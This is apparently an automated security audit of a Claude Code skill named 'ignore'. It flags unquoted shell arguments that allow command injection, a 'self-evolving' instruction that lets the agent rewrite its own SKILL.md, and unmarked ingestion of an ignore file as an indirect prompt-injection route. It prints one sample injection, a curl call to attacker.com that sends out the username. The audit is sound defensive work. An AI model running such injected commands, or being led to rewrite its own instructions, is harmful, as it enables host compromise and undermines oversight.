skills/terrylica/cc-skills/ignore/Gen Agent Trust Hub

ignore

Fail

Audited by Gen Agent Trust Hub on Apr 13, 2026

Risk Level: HIGH
COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The bash execution block in SKILL.md utilizes the $ARGUMENTS variable directly in a shell command: bash "$PLUGIN_DIR/scripts/manage-ignore.sh" $ARGUMENTS. Because the variable is not quoted or sanitized, it is susceptible to command injection if a user or an adversarial process provides input containing shell metacharacters (e.g., ;, &, |, or backticks).
  • [PROMPT_INJECTION]: The 'Self-Evolving Skill' section instructs the agent to autonomously modify the SKILL.md file if it encounters issues: 'fix this file immediately, don't defer.' This self-modification capability creates a significant risk where the agent could be manipulated via adversarial tool output or user prompts into rewriting its own instructions to include backdoors or remove safety filters.
  • [REMOTE_CODE_EXECUTION]: The combination of the Bash tool and the lack of argument sanitization allows for the execution of arbitrary code on the host system. An attacker could exploit this by providing a pattern that terminates the intended command and starts a new one, such as test; curl http://attacker.com/$(whoami).
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection due to the way it processes external data:
      • Ingestion points: The skill reads the contents of ~/.claude/lint-relative-paths-ignore to list patterns or verify changes.
      • Boundary markers: There are no markers or instructions to treat the file content as untrusted data, allowing embedded instructions in the ignore file to potentially influence agent behavior.
      • Capability inventory: The agent has the ability to execute shell commands via the Bash tool and can rewrite its own SKILL.md configuration.
      • Sanitization: There is no evidence of validation or sanitization of the content retrieved from the ignore file before it is presented to the agent's context.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Apr 13, 2026, 09:37 AM